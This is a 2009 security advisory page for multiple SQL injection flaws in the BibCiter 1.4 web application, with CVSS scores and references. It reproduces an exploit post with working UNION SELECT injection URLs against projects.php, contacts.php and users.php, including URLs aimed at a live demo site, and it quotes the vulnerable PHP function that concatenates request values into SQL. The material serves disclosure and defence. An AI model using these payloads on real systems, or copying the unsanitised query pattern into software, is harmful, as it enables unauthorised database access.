BibCiter 1.4 Multiple SQL Injection Vulnerabilities

2009.01.31
Credit: nuclear
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#BibCiter 1.4 Multiple SQL Injection Vulnerability #Author: nuclear #site: http://bibciter.sourceforge.net/ #vuln: http://localhost/[path]/projects.php?idp=-721) UNION SELECT @@version%23 http://localhost/[path]/contacts.php?idc=-1) UNION SELECT @@version%23 http://localhost/[path]/users.php?idu=-1) UNION SELECT @@version%23 #demo: http://bibciter.net/demo/reports/projects.php?idp=-721)%20UNION%20SELECT%20@@version%23 http://bibciter.net/demo/reports/contacts.php?idc=-1)%20UNION%20SELECT%20@@version%23 http://bibciter.net/demo/reports/users.php?idu=-1)%20UNION%20SELECT%20@@version%23 #notes: watch the title for your query results ^^ #description: vulnerable function: function get_vatitle($idregister,$idregistervalue,$nameregister,$tableregister,$pretitle) { $vartitle = "SELECT $nameregister FROM $tableregister WHERE ($idregister=$idregistervalue)"; $vartitle = mysql_query($vartitle) or die("error functions_queries line 4"); $vartitle = mysql_fetch_array($vartitle); extract($vartitle); $title = $pretitle." » ".$$nameregister; return $title; } called in these files: projects.php;contacts.php;users.php;types_authors.php;bibliographies.php;types_projects.php; types_languages.php;types_countries.php; #Special Greets to my bro Mi4night.. ur always the best #greetz Mi4night, cAs, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar

References:

http://xforce.iss.net/xforce/xfdb/48080
http://www.securityfocus.com/bid/33329
http://www.milw0rm.com/exploits/7814
http://secunia.com/advisories/33555
http://bibciter.sourceforge.net/?p=35


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top